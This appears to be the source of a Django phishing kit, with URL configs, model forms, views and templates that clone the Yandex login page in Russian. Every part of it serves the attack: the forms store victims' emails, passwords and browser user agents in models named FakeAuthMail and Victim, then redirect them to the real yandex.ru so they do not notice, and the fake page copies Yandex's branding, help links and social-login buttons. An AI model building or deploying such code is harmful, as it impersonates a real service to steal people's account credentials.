fisher/urls.py
from django.urls import path

from .views import FakeAuthView, index


app_name = 'fisher'

urlpatterns = [
    path('auth/', FakeAuthView.as_view(), name='fake_auth'),
    path('', index, name='index'),
]

multiple_fishing/urls.py
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.staticfiles.views import serve
from django.views.decorators.cache import never_cache

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('yandex.urls', namespace='yandex'))
]


if settings.DEBUG:
    urlpatterns.append(
        path('static/<path:path>', never_cache(serve))
    )
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

yandex/urls.py
from django.urls import path

from .views import FakeAuthView, index, logo, return_back, registration, forgot_login, forgot_pwd, social, help


app_name = 'yandex'

urlpatterns = [
    path('help', help, name='help'),
    path('social/<str:social_network_name>', social, name='social'),
    path('forgot_pwd', forgot_pwd, name='forgot_pwd'),
    path('forgot_login', forgot_login, name='forgot_login'),
    path('registration', registration, name='registration'),
    path('auth/return_back', return_back, name='return_back'),
    path('auth/logo', logo, name='logo'),
    path('auth/', FakeAuthView.as_view(), name='fake_auth'),
    path('', index, name='index'),
]

yandex_fishing/urls.py
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('yandexfisher.urls', namespace='fake_auth'))
]

yandexfisher/urls.py
from django.urls import path

from .views import FakeAuthView, index


app_name = 'yandexfisher'

urlpatterns = [
    path('auth/', FakeAuthView.as_view(), name='fake_auth'),
    path('', index, name='index'),
]

yandex/forms.py
from django.forms import ModelForm, HiddenInput

from .models.fakeauth import FakeAuthMail


class FakeAuthForm(ModelForm):
    class Meta:
        model = FakeAuthMail
        fields = ('email', 'password', 'user_agent')

yandexfisher/forms.py
from django.forms import ModelForm

from .models import Victim


class FakeAuthForm(ModelForm):
    class Meta:
        model = Victim
        fields = ('email', 'password')

yandex/views.py
from django.shortcuts import redirect
from django.views.generic.edit import CreateView

from .models.fakeauth import FakeAuthMail
from .forms import FakeAuthForm


def index(request):
    return redirect('https://yandex.ru')


def logo(request):
    return redirect('https://yandex.ru')


def return_back(request):
    return redirect('https://yandex.ru')


def registration(request):
    return redirect('https://clck.ru/PDMmF')


def forgot_login(request):
    return redirect('https://clck.ru/PD3G6')


def forgot_pwd(request):
    return redirect('https://clck.ru/PDyC2')


def social(request, social_network_name):
    socials = {
        'vk'        : 'https://clck.ru/PCbu2',
        'fb'        : 'https://www.facebook.com/login.php?skip_api_login=1&api_key=216570901687097&kid_directed_site=0&app_id=216570901687097&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fv3.2%2Fdialog%2Foauth%3Fstate%3Dhttps%253A%252F%252Fsocial.yandex.ru%252Fbroker2%252F0ba627072bad404f8591b023af698fe0%252Fcallback%26redirect_uri%3Dhttps%253A%252F%252Fsocial.yandex.ru%252Fbroker%252Fredirect%26response_type%3Dcode%26client_id%3D216570901687097%26scope%3Duser_gender%252Cuser_link%252Cuser_birthday%252Cemail%26display%3Dpopup%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3Dd86e1bfa-ce79-458a-9184-8c1d8b4b248f&cancel_url=https%3A%2F%2Fsocial.yandex.ru%2Fbroker%2Fredirect%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3Dhttps%253A%252F%252Fsocial.yandex.ru%252Fbroker2%252F0ba627072bad404f8591b023af698fe0%252Fcallback%23_%3D_&display=popup&locale=en_GB&pl_dbl=0', 
        'google'    : 'https://clck.ru/PCkEz', 
        'my_world'  : 'https://clck.ru/PCmCR',
        'ok'        : 'https://clck.ru/PCn7h',
        'twitter'   : 'https://clck.ru/PCoAd',
    }
    return redirect(socials.get(social_network_name))


def help(request):
    return redirect('https://yandex.ru/support/passport/')


class FakeAuthView(CreateView):
    model = FakeAuthMail
    form_class = FakeAuthForm
    template_name = 'yandex_fake_auth.html'
    success_url = 'https://yandex.ru'

yandexfisher/views.py
from django.shortcuts import redirect
from django.views.generic.edit import CreateView

from .models import Victim
from .forms import FakeAuthForm


def index(request):
    return redirect('https://yandex.ru')


class FakeAuthView(CreateView):
    model = Victim
    form_class = FakeAuthForm
    template_name = 'fake_auth.html'
    success_url = 'https://yandex.ru'

templates/base.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>
        {% block title %}
        {% endblock %}
    </title>
    <link rel="stylesheet" href="{{ STATIC_URL }}css/style.css">
    <link rel="shortcut icon" type="image/png" href="{{ STATIC_URL }}img/favicon.ico"/>
</head>
<body>
    {% block fisher %}
    {% endblock %}
</body>
</html>

yandex/templates/base.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>
        {% block title %}
        {% endblock %}
    </title>
    <link rel="stylesheet" href="{{ STATIC_URL }}/css/min/yandex.min.css">
    <link rel="shortcut icon" type="image/png" href="{{ STATIC_URL }}img/yandex/favicon.ico"/>
</head>
<body>
    {% block content %}
    {% endblock %}

    <script src="{{ STATIC_URL }}/js/yandex.js"></script>
</body>
</html>

yandex/templates/yandex_fake_auth.html
{% extends 'base.html' %}

{% block title %}
    Авторизация
{% endblock %}

{% block content %}
    <div class="yandex-auth">

        <div class="yandex-auth__bg-image">
            <img class="yandex-auth__bg-image__image" src="{{ STATIC_URL }}img/yandex/yandex_bg.jpg">
        </div>
        
        <div class="yandex-auth__container">

            <div class="yandex-auth__container__header">
                <a class="yandex-auth__container__header__return" id="low-visible" href="{% url 'yandex:return_back' %}">
                    <img src="{{ STATIC_URL }}img/yandex/return.svg" width="28px" height="28px">
                </a>
                <a class="yandex-auth__container__header__registration" href="{% url 'yandex:registration' %}">Зарегистрироваться</a>
            </div>

            <a href="{% url 'yandex:logo' %}" class="yandex-auth__container__logo" id="low-visible">
                <img src="{{ STATIC_URL }}img/yandex/yandex_logo.png">
            </a>
            
            <p class="yandex-auth__container__underlogo" id="low-visible">
                Войдите, чтобы продолжить
            </p>

            <div class="loader"></div>
            
            <div>
                <form class="yandex-auth__container__form" method="post" autocomplete="on">    
                    {% csrf_token %}

                    <div class="yandex-auth__container__form__container">
                        <input type="email"
                               id="input1"
                               class="yandex-auth__container__form__container__field input"
                               name="email"
                               required>
                        <label id="label1">Введите логин, почту или телефон</label>
                        <a class="yandex-auth__container__form__container__forgot-login" href="{% url 'yandex:forgot_login' %}">Не помню логин</a>
                    </div>
    
                    <div class="yandex-auth__container__form__container">
                        <input type="password"
                               id="input2"
                               class="yandex-auth__container__form__container__field input"
                               name="password"
                               required
                               pattern="\w{1,}">
                        <label id="label2">Введите пароль</label>
                        <a class="yandex-auth__container__form__container__forgot-login" href="{% url 'yandex:forgot_pwd' %}">Не помню пароль</a>

                        <img id="low-visible" 
                             class="yandex-auth__container__form__container__input-img pwdEye" 
                             src="{{ STATIC_URL }}img/yandex/pwd_eye_opened.png">
                    </div>

                    <input type="hidden"
                           id="UserAgentInput" 
                           name="user_agent" 
                           initial="none" 
                           value="">
                    
                    <p>
                        <button class="yandex-auth__container__form__btn" type="submit" value="Войти" id="low-visible">
                            <span class="yandex-auth__container__form__btn__text">
                                Войти
                            </span>
    
                            <img class="yandex-auth__container__form__btn__icon"  src="{{ STATIC_URL }}img/yandex/qr-code.png"> 
                        </button>
                    </p>
                </form>
    
                <button onclick="window.location.href='{% url 'yandex:registration' %}';" class="yandex-auth__container__btn-reg" value="Зарегистрироваться">
                    <span class="yandex-auth__container__btn-reg__text" href="yandex.ru">
                        Зарегистрироваться
                    </span>
                </button>
            </div>

            <div class="yandex-auth__container__social"  id="low-visible">
                <p>Войти с помощью соцсетей</p>
                
                <div class="yandex-auth__container__social__icons" id="socialIcons">
                    <a href="{% url 'yandex:social' 'vk' %}">
                        <img src="{{ STATIC_URL }}img/yandex/vk.png" width="25px" height="25px" align="middle">
                    </a>

                    <a href="{% url 'yandex:social' 'fb' %}">
                        <img src="{{ STATIC_URL }}img/yandex/facebook.png" width="25px" height="25px" align="middle">
                    </a>

                    <a href="{% url 'yandex:social' 'google' %}">
                        <img src="{{ STATIC_URL }}img/yandex/google.png" width="25px" height="27px" align="middle">
                    </a>

                    <a id="more">
                        <img src="{{ STATIC_URL }}img/yandex/more.svg" width="25px" height="25px" align="middle">
                    </a>

                    <a href="{% url 'yandex:social' 'my_world' %}">
                        <img src="{{ STATIC_URL }}img/yandex/mail_moi_mir.png" width="25px" height="25px" align="middle">
                    </a>

                    <a href="{% url 'yandex:social' 'ok' %}">
                        <img src="{{ STATIC_URL }}img/yandex/odnoklassniki.png" width="25px" height="25px" align="middle">
                    </a>

                    <a href="{% url 'yandex:social' 'twitter' %}">
                        <img src="{{ STATIC_URL }}img/yandex/twitter.png" width="25px" height="25px" align="middle">
                    </a>
                </div>
            </div>

        </div>

        <div class="yandex-auth__footer">
            <a class="yandex-auth__footer__help" href="{% url 'yandex:help' %}">Помощь</a>
            <span>© 2001-2020, Яндекс</span>
        </div>

    </div>
{% endblock %}

yandexfisher/templates/fake_auth.html
{% extends 'base.html' %}

{% block title %}
    Авторизация
{% endblock %}

{% block fisher %}
    <form method="post" autocomplete="on">
        {% csrf_token %}

        <p>
            <label>Email</label>
            <input type="email"
                   class="content__auth__form__field"
                   name="email"
                   placeholder="Введите ваш email"
                   aria-label="Email"
                   required>
        </p>
        <p>
            <label>Пароль</label>
            <input type="password"
                   class="content__auth__form__field"
                   name="password"
                   placeholder="Введите ваш пароль"
                   aria-label="Пароль"
                   required
                   pattern="\w{8,}">
        </p>

        <input class="content__auth__form__btn" type="submit" value="Войти">
    </form>
{% endblock %}